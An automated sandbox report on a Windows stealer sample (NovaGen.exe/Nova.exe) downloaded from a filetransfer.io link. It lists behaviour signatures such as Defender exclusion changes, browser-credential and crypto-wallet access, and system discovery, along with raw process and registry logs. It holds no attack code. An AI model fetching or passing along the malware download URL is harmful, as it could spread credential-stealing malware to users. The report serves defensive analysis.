hxxps://s25[.]filetransfer[.]io/storage/download/Nibb6LCyn7Y4

Analysis

max time kernel
448s
max time network
403s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
11-05-2024 09:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://s25.filetransfer.io/storage/download/Nibb6LCyn7Y4

Score

8^/10

execution pyinstaller spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5912	powershell.exe
1948	powershell.exe
5856	powershell.exe
1240	powershell.exe
5728	powershell.exe
3744	powershell.exe
5500	powershell.exe
5040	powershell.exe

Executes dropped EXE 30 IoCs

Processes:

NovaGen.exeNovaGen.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exeNova.exe

pid	process
4720	NovaGen.exe
3816	NovaGen.exe
4696	Nova.exe
1748	Nova.exe
5848	Nova.exe
3944	Nova.exe
3228	Nova.exe
3848	Nova.exe
1948	Nova.exe
5676	Nova.exe
5312	Nova.exe
5356	Nova.exe
4584	Nova.exe
2940	Nova.exe
4712	Nova.exe
4464	Nova.exe
2300	Nova.exe
1428	Nova.exe
4312	Nova.exe
2460	Nova.exe
3560	Nova.exe
5148	Nova.exe
1588	Nova.exe
5276	Nova.exe
5444	Nova.exe
1332	Nova.exe
4572	Nova.exe
4724	Nova.exe
6140	Nova.exe
1696	Nova.exe

Loads dropped DLL 64 IoCs

Processes:

NovaGen.exeNova.exeNova.exeNova.exe

pid	process
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
3816	NovaGen.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
1748	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3944	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe
3848	Nova.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

78 ip-api.com
115 ip-api.com

flow	ioc
78	ip-api.com
115	ip-api.com

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\NovaGen.exe	pyinstaller
C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe	pyinstaller

Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

6000 WMIC.exe
3564 WMIC.exe
3312 WMIC.exe
5496 WMIC.exe

pid	process
6000	WMIC.exe
3564	WMIC.exe
3312	WMIC.exe
5496	WMIC.exe

Enumerates processes with tasklist 1 TTPs 12 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
5692	tasklist.exe
4556	tasklist.exe
5020	tasklist.exe
3024	tasklist.exe
5544	tasklist.exe
5796	tasklist.exe
4560	tasklist.exe
5756	tasklist.exe
2436	tasklist.exe
4960	tasklist.exe
5092	tasklist.exe
4560	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Gathers system information 1 TTPs 4 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exesysteminfo.exesysteminfo.exe

pid process

884 systeminfo.exe
4580 systeminfo.exe
5672 systeminfo.exe
5036 systeminfo.exe

pid	process
884	systeminfo.exe
4580	systeminfo.exe
5672	systeminfo.exe
5036	systeminfo.exe

Kills process with taskkill 11 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
224	taskkill.exe
5808	taskkill.exe
5224	taskkill.exe
6084	taskkill.exe
2592	taskkill.exe
3172	taskkill.exe
5500	taskkill.exe
5720	taskkill.exe
1120	taskkill.exe
2392	taskkill.exe
5248	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133598952099515119"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 2 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3107365284-1576850094-161165143-1000\{17BEDAB0-B30C-467C-A29C-B8BD83A3D534}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	chrome.exe

NTFS ADS 1 IoCs

Processes:

chrome.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Nova_Gen.zip:Zone.Identifier chrome.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Nova_Gen.zip:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4584	chrome.exe
4584	chrome.exe
3120	chrome.exe
3120	chrome.exe
3848	powershell.exe
3848	powershell.exe
1948	powershell.exe
1948	powershell.exe
3848	powershell.exe
1948	powershell.exe
5220	powershell.exe
5220	powershell.exe
5220	powershell.exe
5728	powershell.exe
5728	powershell.exe
5728	powershell.exe
5440	powershell.exe
5440	powershell.exe
4912	powershell.exe
4912	powershell.exe
5064	powershell.exe
5064	powershell.exe
4356	powershell.exe
4356	powershell.exe
5648	chrome.exe
5648	chrome.exe
5856	powershell.exe
1164	powershell.exe
5856	powershell.exe
1164	powershell.exe
3744	powershell.exe
3744	powershell.exe
5608	powershell.exe
5608	powershell.exe
3744	powershell.exe
5608	powershell.exe
1728	powershell.exe
1728	powershell.exe
892	powershell.exe
892	powershell.exe
1620	powershell.exe
1620	powershell.exe
5908	powershell.exe
5908	powershell.exe
1240	powershell.exe
4400	powershell.exe
4400	powershell.exe
1240	powershell.exe
2400	powershell.exe
2400	powershell.exe
5500	powershell.exe
5500	powershell.exe
2400	powershell.exe
5500	powershell.exe
1572	powershell.exe
1572	powershell.exe
5088	powershell.exe
5088	powershell.exe
4412	powershell.exe
4412	powershell.exe
6016	powershell.exe
6016	powershell.exe
1580	powershell.exe
5912	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

chrome.exechrome.exe

pid	process
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe
Token: SeShutdownPrivilege	4584	chrome.exe
Token: SeCreatePagefilePrivilege	4584	chrome.exe

Suspicious use of FindShellTrayWindow 63 IoCs

Processes:

chrome.exe7zG.exechrome.exe

pid	process
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4644	7zG.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exechrome.exe

pid	process
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
4584	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4584 wrote to memory of 400	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 400	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 2464	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 5072	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 5072	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe
PID 4584 wrote to memory of 3040	4584	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://s25.filetransfer.io/storage/download/Nibb6LCyn7Y4
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8a21cab58,0x7ff8a21cab68,0x7ff8a21cab78
2⤵
PID:400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1504 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:2
2⤵
PID:2464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:5072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2148 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:3040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:1
2⤵
PID:2672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:1
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4240 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:3024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:3472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4280 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:1
2⤵
PID:2632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=2312 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:1
2⤵
PID:3088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4576 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:2232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4728 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1720 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:1
2⤵
PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3740 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:1
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3160 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:4964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4732 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:3180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
- Modifies registry class
PID:3100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:4308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5104 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:2572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5936 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:1
2⤵
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:3444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4084 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
- NTFS ADS
PID:1932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 --field-trial-handle=1768,i,9927408436850340051,11142069588227089147,131072 /prefetch:8
2⤵
PID:4456

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
